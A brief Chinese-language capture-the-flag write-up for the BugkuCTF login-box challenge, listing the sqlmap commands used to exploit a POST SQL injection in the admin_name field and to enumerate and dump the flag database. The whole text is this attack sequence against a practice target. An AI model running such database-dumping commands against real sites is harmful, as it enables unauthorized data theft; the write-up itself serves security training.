BugkuCTF 这是一个神奇的登陆框
post注入 直接跑sqlmap吧
抓包到本地
sqlmap.py -r "C:\Users\联想\Desktop\1.txt"
admin_name存在注入点
查数据库
sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs
sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tables
sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 -T flag1 --columns
sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 -T flag1 -C flag1 --dump
得到flag